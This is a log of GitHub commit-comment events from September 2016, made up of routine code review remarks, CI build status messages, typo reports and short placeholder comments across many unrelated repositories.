{"id":"4582132182","type":"CommitCommentEvent","actor":{"login":"rwu823"},"repo":{"name":"cepave-f2e/vue-owl-ui"},"payload":{"comment":{"id":19075589,"position":4,"line":4,"path":"src/components/switch/index.js","commit_id":"79e27f723bf0c4aa8862c20dd57cfe78ee1b9aee","created_at":"2016-09-19T09:07:44Z","updated_at":"2016-09-19T09:07:44Z","body":"`'SwitchButton'`   忘記加引號"}},"created_at":"2016-09-19T09:07:44Z"}
{"id":"4582139291","type":"CommitCommentEvent","actor":{"login":"ebuildy"},"repo":{"name":"bep/s3deploy"},"payload":{"comment":{"id":19075609,"position":null,"line":null,"path":null,"commit_id":"6e67e05f7ec4ad1d0a37c058490b2ac16ff18bdf","created_at":"2016-09-19T09:09:20Z","updated_at":"2016-09-19T09:09:20Z","body":"Haaaa many thanks for no-go user ;-)"}},"created_at":"2016-09-19T09:09:20Z"}
{"id":"4582141616","type":"CommitCommentEvent","actor":{"login":"portfolis"},"repo":{"name":"CrazyMad543/Recorder"},"payload":{"comment":{"id":19075614,"position":10,"line":10,"path":"listmodel.cpp","commit_id":"ace31da076d1b0f237a6acf29c248b294883b81e","created_at":"2016-09-19T09:09:51Z","updated_at":"2016-09-19T09:09:51Z","body":"It's not required. This object will call 'clear()' inside own destructor."}},"created_at":"2016-09-19T09:09:51Z"}
{"id":"4582146435","type":"CommitCommentEvent","actor":{"login":"portfolis"},"repo":{"name":"CrazyMad543/Recorder"},"payload":{"comment":{"id":19075627,"position":14,"line":14,"path":"listmodel.cpp","commit_id":"ace31da076d1b0f237a6acf29c248b294883b81e","created_at":"2016-09-19T09:10:58Z","updated_at":"2016-09-19T09:10:58Z","body":"It would be better to implement updating without model reset."}},"created_at":"2016-09-19T09:10:58Z"}
{"id":"4582147909","type":"CommitCommentEvent","actor":{"login":"rwu823"},"repo":{"name":"cepave-f2e/vue-owl-ui"},"payload":{"comment":{"id":19075636,"position":36,"line":36,"path":"src/components/switch/index.js","commit_id":"79e27f723bf0c4aa8862c20dd57cfe78ee1b9aee","created_at":"2016-09-19T09:11:20Z","updated_at":"2016-09-19T09:11:20Z","body":"`,` 後面空一格， js lint 漏抓了，待補上 QQ  @chuanxd "}},"created_at":"2016-09-19T09:11:20Z"}
{"id":"4582148536","type":"CommitCommentEvent","actor":{"login":"lsh-0"},"repo":{"name":"elifesciences/elife-metrics-formula"},"payload":{"comment":{"id":19075638,"position":null,"line":null,"path":null,"commit_id":"166f3ea99b4c0945a9756bbf5b99ee56c0065830","created_at":"2016-09-19T09:11:28Z","updated_at":"2016-09-19T09:11:28Z","body":"this is interesting and new to me - I'm going to have to take a look at the `file.serialize` state more closely."}},"created_at":"2016-09-19T09:11:28Z"}
{"id":"4582149917","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19075640,"position":null,"line":null,"path":null,"commit_id":"62359ef519d9fd94f80ce054dba9d9cccdad66dd","created_at":"2016-09-19T09:11:48Z","updated_at":"2016-09-19T09:11:48Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=3)"}},"created_at":"2016-09-19T09:11:48Z"}
{"id":"4582151848","type":"CommitCommentEvent","actor":{"login":"aars"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19075645,"position":59,"line":245,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T09:12:16Z","updated_at":"2016-09-19T09:12:16Z","body":"rename suggestions:\r\n`identity` -> `identifier`: to match `identifier` from `addRelationship`\r\n`last` -> `previous`: since that's what it is. `last` suggests it's the last relationship in a collection or something. (that's how I parsed it initially)\r\n"}},"created_at":"2016-09-19T09:12:16Z"}
{"id":"4582155550","type":"CommitCommentEvent","actor":{"login":"IvayloG"},"repo":{"name":"IgniteUI/ignite-ui"},"payload":{"comment":{"id":19075659,"position":null,"line":null,"path":null,"commit_id":"162dc348b0205a17f31ff529fdb29001040eece6","created_at":"2016-09-19T09:13:06Z","updated_at":"2016-09-19T09:13:06Z","body":"This portion of the code snippet is irrelevant to the API parsing procedure.\r\n\r\n#370 "}},"created_at":"2016-09-19T09:13:06Z"}
{"id":"4582155748","type":"CommitCommentEvent","actor":{"login":"bep"},"repo":{"name":"bep/s3deploy"},"payload":{"comment":{"id":19075661,"position":null,"line":null,"path":null,"commit_id":"6e67e05f7ec4ad1d0a37c058490b2ac16ff18bdf","created_at":"2016-09-19T09:13:09Z","updated_at":"2016-09-19T09:13:09Z","body":"If this tools gets to be popular I will create downloadable binaries, but not now."}},"created_at":"2016-09-19T09:13:09Z"}
{"id":"4582156715","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"snoyberg/yaml"},"payload":{"comment":{"id":19075663,"position":5,"line":514,"path":"Text/Libyaml.hs","commit_id":"64bf8227f517d6bcd9ec37ac3e2bbb342e05e305","created_at":"2016-09-19T09:13:21Z","updated_at":"2016-09-19T09:13:21Z","body":"You're right. I'm sorry for this, I should have known better!"}},"created_at":"2016-09-19T09:13:21Z"}
{"id":"4582157893","type":"CommitCommentEvent","actor":{"login":"bpoplauschi"},"repo":{"name":"CocoaLumberjack/CocoaLumberjack"},"payload":{"comment":{"id":19075666,"position":null,"line":null,"path":null,"commit_id":"ec2c138ff3d6ce9dabe832cc7c656735c3a8775d","created_at":"2016-09-19T09:13:37Z","updated_at":"2016-09-19T09:13:37Z","body":"It's coming soon. First, a Swift 2.3 release, then the Swift 3.0 release"}},"created_at":"2016-09-19T09:13:37Z"}
{"id":"4582158083","type":"CommitCommentEvent","actor":{"login":"soeiner"},"repo":{"name":"Machplatzwennduunsaufderstrassesiehst/Mental"},"payload":{"comment":{"id":19075667,"position":null,"line":null,"path":null,"commit_id":"5c7a453811015cc45fddd339168a46773418487f","created_at":"2016-09-19T09:13:39Z","updated_at":"2016-09-19T09:13:39Z","body":"Wenn das Semester anfängt spätestens:)"}},"created_at":"2016-09-19T09:13:39Z"}
{"id":"4582162355","type":"CommitCommentEvent","actor":{"login":"snoyberg"},"repo":{"name":"snoyberg/yaml"},"payload":{"comment":{"id":19075680,"position":5,"line":514,"path":"Text/Libyaml.hs","commit_id":"64bf8227f517d6bcd9ec37ac3e2bbb342e05e305","created_at":"2016-09-19T09:14:37Z","updated_at":"2016-09-19T09:14:37Z","body":"I made the same mistake once when benchmarking, and couldn't understand why my new code was so much faster. Lesson learned _very_ quickly, and I haven't forgotten since :)"}},"created_at":"2016-09-19T09:14:37Z"}
{"id":"4582167008","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075688,"position":null,"line":null,"path":null,"commit_id":"2a6a02c8dc4c95c0f75c90270b15a8bfc17bd9d8","created_at":"2016-09-19T09:15:42Z","updated_at":"2016-09-19T09:15:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1039](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13482&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T09:15:42Z"}
{"id":"4582167032","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075689,"position":null,"line":null,"path":null,"commit_id":"d479e126e20dc175282b93439b35811ddc8e1f37","created_at":"2016-09-19T09:15:42Z","updated_at":"2016-09-19T09:15:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1040](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13483&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T09:15:42Z"}
{"id":"4582168979","type":"CommitCommentEvent","actor":{"login":"Aresklivecn"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075693,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T09:16:11Z","updated_at":"2016-09-19T09:16:11Z","body":"0 additions, 2,194 deletions...................what happened man?\r\n"}},"created_at":"2016-09-19T09:16:11Z"}
{"id":"4582171499","type":"CommitCommentEvent","actor":{"login":"Fadds"},"repo":{"name":"yegorf1/RogueBot"},"payload":{"comment":{"id":19075695,"position":null,"line":null,"path":null,"commit_id":"9cf01ae0f1259b9fbc8a97ec8e2bc11926fdc63b","created_at":"2016-09-19T09:16:43Z","updated_at":"2016-09-19T09:16:43Z","body":"(Заеб(ись|ок|ато|ово)|Охуенчик)"}},"created_at":"2016-09-19T09:16:43Z"}
{"id":"4582172588","type":"CommitCommentEvent","actor":{"login":"aars"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19075697,"position":29,"line":212,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T09:16:59Z","updated_at":"2016-09-19T09:16:59Z","body":"`last` is not used for `hasMany` relationships.\r\n(also, current `map` usage just copies the `data`. Why not `Ember.copy`?)"}},"created_at":"2016-09-19T09:16:59Z"}
{"id":"4582173495","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19075699,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T09:17:12Z","updated_at":"2016-09-19T09:17:12Z","body":"@lots0logs We can not include changes file inside makefile , Launchpad source can not hold git directory and so it can't process any git command."}},"created_at":"2016-09-19T09:17:12Z"}
{"id":"4582174051","type":"CommitCommentEvent","actor":{"login":"lafrech"},"repo":{"name":"Scille/umongo"},"payload":{"comment":{"id":19075700,"position":23,"line":91,"path":"umongo/data_proxy.py","commit_id":"1dd4076998c4171e2482bd4609933c761311e2e2","created_at":"2016-09-19T09:17:19Z","updated_at":"2016-09-19T09:17:19Z","body":"I think it should be\r\n\r\n    for k in data:\r\n\r\notherwise it chokes on fields with `attribute`."}},"created_at":"2016-09-19T09:17:19Z"}
{"id":"4582176165","type":"CommitCommentEvent","actor":{"login":"Oyangiz"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075701,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T09:17:48Z","updated_at":"2016-09-19T09:17:48Z","body":"Removed according to regulations？"}},"created_at":"2016-09-19T09:17:48Z"}
{"id":"4582177212","type":"CommitCommentEvent","actor":{"login":"zb13431116541"},"repo":{"name":"zb13431116541/zhbok"},"payload":{"comment":{"id":19075702,"position":null,"line":null,"path":null,"commit_id":"a92bc38f0a649275fd4ba575800373b01e42d297","created_at":"2016-09-19T09:18:03Z","updated_at":"2016-09-19T09:18:03Z","body":"sdfjsdkfjsd;as niousfsvnvfdgpi"}},"created_at":"2016-09-19T09:18:03Z"}
{"id":"4582178853","type":"CommitCommentEvent","actor":{"login":"kuafoo"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19075709,"position":null,"line":null,"path":null,"commit_id":"2db5aa15722307fb6ad703627933224f5f74bbe3","created_at":"2016-09-19T09:18:24Z","updated_at":"2016-09-19T09:18:24Z","body":"Good!"}},"created_at":"2016-09-19T09:18:24Z"}
{"id":"4582179040","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075710,"position":57,"line":64,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"5d84490d701a49c32b39bb9fc07fe5a6c5512599","created_at":"2016-09-19T09:18:26Z","updated_at":"2016-09-19T09:18:26Z","body":"I don't understand why this is necessary. `parent.key` is always the same as `key`, right?"}},"created_at":"2016-09-19T09:18:26Z"}
{"id":"4582179579","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-url-field"},"payload":{"comment":{"id":19075711,"position":null,"line":null,"path":null,"commit_id":"f748ea2e9e333e8a1ba4ca1e4cc8128cc3284fb3","created_at":"2016-09-19T09:18:34Z","updated_at":"2016-09-19T09:18:34Z","body":"Indeed, we've been going the jQuery way, while we probably should have picked up a thing or two to from React. That said, I don't think it's wise to start any new way of defining our APIs at this point. This will only make for more confusion and code that is harder to work with. We should stick to our chosen path for the sake of consistency. Changing from wings to wheels mid-air is far from ideal."}},"created_at":"2016-09-19T09:18:34Z"}
{"id":"4582179857","type":"CommitCommentEvent","actor":{"login":"karianna"},"repo":{"name":"microprofile/gitpress"},"payload":{"comment":{"id":19075712,"position":7,"line":7,"path":"src/main/static/assets/templates/dir_presentations.jade","commit_id":"07c3bdd003318834c91c50e05f7baf586d4e1017","created_at":"2016-09-19T09:18:38Z","updated_at":"2016-09-19T09:18:38Z","body":"Updated, got caught out by gitignore."}},"created_at":"2016-09-19T09:18:38Z"}
{"id":"4582181508","type":"CommitCommentEvent","actor":{"login":"aars"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19075714,"position":66,"line":252,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T09:19:01Z","updated_at":"2016-09-19T09:19:01Z","body":"Set up `ref.added`, `ref.removals`, `ref.changed` and `ref.previous` in `setupRelationships`?"}},"created_at":"2016-09-19T09:19:01Z"}
{"id":"4582181906","type":"CommitCommentEvent","actor":{"login":"HydarHussain"},"repo":{"name":"HydarHussain/myrepository"},"payload":{"comment":{"id":19075715,"position":null,"line":null,"path":null,"commit_id":"e2ee4212906460195ce56ac5ae020d1387d255d1","created_at":"2016-09-19T09:19:07Z","updated_at":"2016-09-19T09:19:07Z","body":"hi,this is hydar"}},"created_at":"2016-09-19T09:19:07Z"}
{"id":"4582182410","type":"CommitCommentEvent","actor":{"login":"Mireia86"},"repo":{"name":"Mireia86/Furniture"},"payload":{"comment":{"id":19075718,"position":null,"line":null,"path":null,"commit_id":"e7ef0600dca7b000eb378c3e236860ecb51cd25c","created_at":"2016-09-19T09:19:13Z","updated_at":"2016-09-19T09:19:13Z","body":"Furniture page"}},"created_at":"2016-09-19T09:19:13Z"}
{"id":"4582182634","type":"CommitCommentEvent","actor":{"login":"ok406lhq"},"repo":{"name":"ok406lhq/Java"},"payload":{"comment":{"id":19075721,"position":null,"line":null,"path":null,"commit_id":"6e219c7d1247c1093b5e14faaedbf74596681630","created_at":"2016-09-19T09:19:16Z","updated_at":"2016-09-19T09:19:16Z","body":"IOS"}},"created_at":"2016-09-19T09:19:16Z"}
{"id":"4582184210","type":"CommitCommentEvent","actor":{"login":"Mireia86"},"repo":{"name":"Mireia86/Furniture"},"payload":{"comment":{"id":19075725,"position":2,"line":2,"path":"README.md","commit_id":"e7ef0600dca7b000eb378c3e236860ecb51cd25c","created_at":"2016-09-19T09:19:37Z","updated_at":"2016-09-19T09:19:37Z","body":"Furniture page with angular"}},"created_at":"2016-09-19T09:19:37Z"}
{"id":"4582184818","type":"CommitCommentEvent","actor":{"login":"torognes"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19075729,"position":217,"line":2671,"path":"man/vsearch.1","commit_id":"36669b797096b4ad27865f6ff3dd54e8e1918417","created_at":"2016-09-19T09:19:46Z","updated_at":"2016-09-19T09:19:46Z","body":"Oops, you're absolutely right."}},"created_at":"2016-09-19T09:19:46Z"}
{"id":"4582185003","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19075730,"position":81,"line":510,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/FunctionCodegen.java","commit_id":"a4ddee3f3ae9c23dcb7bea31c119ab0d60932c22","created_at":"2016-09-19T09:19:48Z","updated_at":"2016-09-19T09:19:48Z","body":"You can use `StringsKt.join` from our project"}},"created_at":"2016-09-19T09:19:48Z"}
{"id":"4582185022","type":"CommitCommentEvent","actor":{"login":"aars"},"repo":{"name":"pixelhandler/ember-jsonapi-resources"},"payload":{"comment":{"id":19075731,"position":69,"line":255,"path":"addon/models/resource.js","commit_id":"5ebd1eaf6ff99fa698ba7dbf9dcc169337334fa4","created_at":"2016-09-19T09:19:49Z","updated_at":"2016-09-19T09:19:49Z","body":"Redundant check. Could simply be `ref.removals.rejectBy('id', id)`."}},"created_at":"2016-09-19T09:19:49Z"}
{"id":"4582186181","type":"CommitCommentEvent","actor":{"login":"Nithinnjongini"},"repo":{"name":"Nithinnjongini/hello-world"},"payload":{"comment":{"id":19075736,"position":null,"line":null,"path":null,"commit_id":"58e1d35042f5b9dc5925abeaec04218a23ef2837","created_at":"2016-09-19T09:20:07Z","updated_at":"2016-09-19T09:20:07Z","body":"This is my first "}},"created_at":"2016-09-19T09:20:07Z"}
{"id":"4582186366","type":"CommitCommentEvent","actor":{"login":"RamiLego4Game"},"repo":{"name":"RamiLego4Game/LIKO-12"},"payload":{"comment":{"id":19075737,"position":null,"line":null,"path":null,"commit_id":"c9f191bcaf428b566f51e68f17dcbbc7923bd202","created_at":"2016-09-19T09:20:11Z","updated_at":"2016-09-19T09:20:11Z","body":"Fixed Issue #13 "}},"created_at":"2016-09-19T09:20:11Z"}
{"id":"4582187125","type":"CommitCommentEvent","actor":{"login":"lizhong1008"},"repo":{"name":"lizhong1008/libyami-utils"},"payload":{"comment":{"id":19075738,"position":21,"line":125,"path":"tests/yamitranscode.cpp","commit_id":"43a09803ae976e3d1815a4867fc37e5f0804dce3","created_at":"2016-09-19T09:20:20Z","updated_at":"2016-09-19T09:20:20Z","body":"@xuguangxin , we have another -h option to print_help. So would better not change it"}},"created_at":"2016-09-19T09:20:20Z"}
{"id":"4582190511","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075747,"position":92,"line":99,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"5d84490d701a49c32b39bb9fc07fe5a6c5512599","created_at":"2016-09-19T09:21:02Z","updated_at":"2016-09-19T09:21:02Z","body":"If I understood it correctly, if the state is \"User\", then it must be in the user profile, so you only need to check the top-most container of each stack."}},"created_at":"2016-09-19T09:21:02Z"}
{"id":"4582190653","type":"CommitCommentEvent","actor":{"login":"Darkside-"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19075748,"position":null,"line":null,"path":null,"commit_id":"dba0f14591d3747684a9b2aa30b4edf8a3192cfc","created_at":"2016-09-19T09:21:04Z","updated_at":"2016-09-19T09:21:04Z","body":"@brodee  I'm getting a compilation error with this file. \r\n\r\n`mage/sets/kaladesh/InventorsGoggles.java:[61,25] no suitable constructor found for EntersBattlefieldControlledTriggeredAbility(mage.constants.Zone,mage.abilities.effects.common.AttachEffect,mage.filter.FilterPermanent,boolean,mage.constants.SetTargetPointer,<nulltype>,boolean)\r\n    constructor mage.abilities.common.EntersBattlefieldControlledTriggeredAbility.EntersBattlefieldControlledTriggeredAbility(mage.abilities.effects.Effect,mage.filter.FilterPermanent) is not applicable\r\n      (actual and formal argument lists differ in length)\r\n    constructor mage.abilities.common.EntersBattlefieldControlledTriggeredAbility.EntersBattlefieldControlledTriggeredAbility(mage.abilities.effects.Effect,mage.filter.FilterPermanent,java.lang.String) is not applicable\r\n      (actual and formal argument lists differ in length)\r\n    constructor mage.abilities.common.EntersBattlefieldControlledTriggeredAbility.EntersBattlefieldControlledTriggeredAbility(mage.constants.Zone,mage.abilities.effects.Effect,mage.filter.FilterPermanent,boolean) is not applicable\r\n      (actual and formal argument lists differ in length)\r\n    constructor mage.abilities.common.EntersBattlefieldControlledTriggeredAbility.EntersBattlefieldControlledTriggeredAbility(mage.constants.Zone,mage.abilities.effects.Effect,mage.filter.FilterPermanent,boolean,java.lang.String) is not applicable\r\n      (actual and formal argument lists differ in length)\r\n    constructor mage.abilities.common.EntersBattlefieldControlledTriggeredAbility.EntersBattlefieldControlledTriggeredAbility(mage.constants.Zone,mage.abilities.effects.Effect,mage.filter.FilterPermanent,boolean,mage.constants.SetTargetPointer,java.lang.String) is not applicable\r\n      (actual and formal argument lists differ in length)\r\n    constructor mage.abilities.common.EntersBattlefieldControlledTriggeredAbility.EntersBattlefieldControlledTriggeredAbility(mage.abilities.common.EntersBattlefieldControlledTriggeredAbility) is not applicable\r\n      (actual and formal argument lists differ in length)\r\n1 error`"}},"created_at":"2016-09-19T09:21:04Z"}
{"id":"4582192766","type":"CommitCommentEvent","actor":{"login":"Ron-Ramsay"},"repo":{"name":"Ron-Ramsay/transcriptM"},"payload":{"comment":{"id":19075754,"position":34,"line":952,"path":"transcriptm/pipeline.py","commit_id":"94bea651a17490af5c5666f01ecb7659c728af75","created_at":"2016-09-19T09:21:31Z","updated_at":"2016-09-19T09:21:31Z","body":"spelling mistake: task_func**t** instead of task_func"}},"created_at":"2016-09-19T09:21:31Z"}
{"id":"4582193030","type":"CommitCommentEvent","actor":{"login":"wangchong825"},"repo":{"name":"wangchong825/test"},"payload":{"comment":{"id":19075755,"position":null,"line":null,"path":null,"commit_id":"7b9323cbd228b4adc8bf78658761fb793ef874da","created_at":"2016-09-19T09:21:35Z","updated_at":"2016-09-19T09:21:35Z","body":"inti"}},"created_at":"2016-09-19T09:21:35Z"}
{"id":"4582194538","type":"CommitCommentEvent","actor":{"login":"kholk"},"repo":{"name":"sonyxperiadev/kernel"},"payload":{"comment":{"id":19075760,"position":null,"line":null,"path":null,"commit_id":"beefc265c1c11b87529fac01a67b68c288b95894","created_at":"2016-09-19T09:21:56Z","updated_at":"2016-09-19T09:21:56Z","body":"I have only single sim variant, but I can try to implement the DSDS DT.... No promises though! "}},"created_at":"2016-09-19T09:21:56Z"}
{"id":"4582196190","type":"CommitCommentEvent","actor":{"login":"ilveroluca"},"repo":{"name":"brainstorm/bss"},"payload":{"comment":{"id":19075764,"position":null,"line":null,"path":null,"commit_id":"c0b2a41061be8903e583c7b0475a5c1b80bd25a0","created_at":"2016-09-19T09:22:18Z","updated_at":"2016-09-19T09:22:18Z","body":"You may be jumping the gun @brainstorm.  We don't stream the sequencer output, yet.  There's room for these ideas in the new project.  We'll convince @fversaci to help get our publication's code on github within the Seal project so we can hack at it together."}},"created_at":"2016-09-19T09:22:18Z"}
{"id":"4582198487","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19075765,"position":44,"line":33,"path":"doc_src/history.txt","commit_id":"76c73aa8ce70d65532cf8e0257218f3a06530601","created_at":"2016-09-19T09:22:49Z","updated_at":"2016-09-19T09:22:49Z","body":"typo: \"on of the\""}},"created_at":"2016-09-19T09:22:49Z"}
{"id":"4582199321","type":"CommitCommentEvent","actor":{"login":"abrodkin"},"repo":{"name":"vlad-zakharov/u-boot"},"payload":{"comment":{"id":19075767,"position":4,"line":26,"path":"arch/arc/dts/axs10x.dts","commit_id":"2ba1560accd1e0bf62d30b7344381c27bab8ff1d","created_at":"2016-09-19T09:23:00Z","updated_at":"2016-09-19T09:23:00Z","body":"Node name should be `clkXXX@f0000000`.\r\nPls refer to Linux kernel examples."}},"created_at":"2016-09-19T09:23:00Z"}
{"id":"4582200339","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"the-tcpdump-group/libpcap"},"payload":{"comment":{"id":19075770,"position":10,"line":1031,"path":"pcap-common.c","commit_id":"21ab5f1175655f1bb523764c7d70bc94c1e651b1","created_at":"2016-09-19T09:23:13Z","updated_at":"2016-09-19T09:23:13Z","body":"Why ``LINKTYPE_MATCHING_MAX`` is not changed to 265 here?"}},"created_at":"2016-09-19T09:23:13Z"}
{"id":"4582200830","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19075772,"position":null,"line":null,"path":null,"commit_id":"040b8693720c1f7907fe910b65b71f06b8adf100","created_at":"2016-09-19T09:23:20Z","updated_at":"2016-09-19T09:23:20Z","body":"Our repo at launchpad only importing source from github. It doesn't hold the `.git` directory. So anything related to git will fail. https://launchpadlibrarian.net/285254622/buildlog_ubuntu-xenial-amd64.numix-gtk-theme_2.6.0+569~201609190748~ubuntu16.04.1_BUILDING.txt.gz"}},"created_at":"2016-09-19T09:23:20Z"}
{"id":"4582201213","type":"CommitCommentEvent","actor":{"login":"gducrozet"},"repo":{"name":"LHEEA/HOS-ocean"},"payload":{"comment":{"id":19075774,"position":189,"line":287,"path":"sources/utilities/maths.f90","commit_id":"e34e5603500404c191a6b9662b3af792d9462ce3","created_at":"2016-09-19T09:23:25Z","updated_at":"2016-09-19T09:23:25Z","body":"This function is indeed probably unused now. It was initially written to ensure the result to be in [0,2 pi]. \nHowever as you noticed ATAN2 can also be used to this purpose.\n\n--\nGuillaume Ducrozet\nLHEEA Lab, Ocean and Wave Energy research group\nEcole Centrale de Nantes, Nantes, France\nTel : +33 240 371 645, Fax : +33 240 372 523\n\n\n\n\n\n\n> Le 16 sept. 2016 à 00:06, Nicolas Cellier <notifications@github.com> a écrit :\n> \n> I wonder why not just using atan2(aimag(z),real(z))?\n> Result would be in (-pi,pi), but is it that important?\n> Hard to tell because phase(z) seems unused in this project...\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/LHEEA/HOS-ocean/commit/e34e5603500404c191a6b9662b3af792d9462ce3#commitcomment-19045448>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJXVtrgrhuVFSfEPzHNNxSBK5tituIHdks5qqcFugaJpZM4J-Z6u>.\n> \n\n"}},"created_at":"2016-09-19T09:23:25Z"}
{"id":"4582201229","type":"CommitCommentEvent","actor":{"login":"HarukaMa"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19075775,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T09:23:25Z","updated_at":"2016-09-19T09:23:25Z","body":"lol I sense a `push --force`..."}},"created_at":"2016-09-19T09:23:25Z"}
{"id":"4582201420","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075777,"position":10,"line":10,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T09:23:28Z","updated_at":"2016-09-19T09:23:28Z","body":"It's protected. "}},"created_at":"2016-09-19T09:23:28Z"}
{"id":"4582201590","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19075780,"position":55,"line":43,"path":"doc_src/history.txt","commit_id":"76c73aa8ce70d65532cf8e0257218f3a06530601","created_at":"2016-09-19T09:23:30Z","updated_at":"2016-09-19T09:23:30Z","body":"how about `history help`?"}},"created_at":"2016-09-19T09:23:30Z"}
{"id":"4582201799","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075781,"position":13,"line":13,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T09:23:33Z","updated_at":"2016-09-19T09:23:33Z","body":"It's protected."}},"created_at":"2016-09-19T09:23:33Z"}
{"id":"4582202866","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075784,"position":null,"line":null,"path":null,"commit_id":"2a6a02c8dc4c95c0f75c90270b15a8bfc17bd9d8","created_at":"2016-09-19T09:23:48Z","updated_at":"2016-09-19T09:23:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1039](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13482&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 215, ignored: 3 Build time: 00:08:06\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T09:23:48Z"}
{"id":"4582202889","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19075785,"position":null,"line":null,"path":null,"commit_id":"f6ae31244c0665f52c88c09e3d6e1e400a6ee0b5","created_at":"2016-09-19T09:23:48Z","updated_at":"2016-09-19T09:23:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1041](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13490&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T09:23:48Z"}
{"id":"4582204254","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19075788,"position":36,"line":36,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"50f7c41ae4c92c45f753a408458e3041df227e99","created_at":"2016-09-19T09:24:09Z","updated_at":"2016-09-19T09:24:09Z","body":"I don't think so."}},"created_at":"2016-09-19T09:24:09Z"}
{"id":"4582205567","type":"CommitCommentEvent","actor":{"login":"10alswhd"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19075789,"position":null,"line":null,"path":null,"commit_id":"8233f33b992d3b6d4b999f6a592176a82bd59044","created_at":"2016-09-19T09:24:26Z","updated_at":"2016-09-19T09:24:26Z","body":"소수 판별 프로그램 입니다."}},"created_at":"2016-09-19T09:24:26Z"}
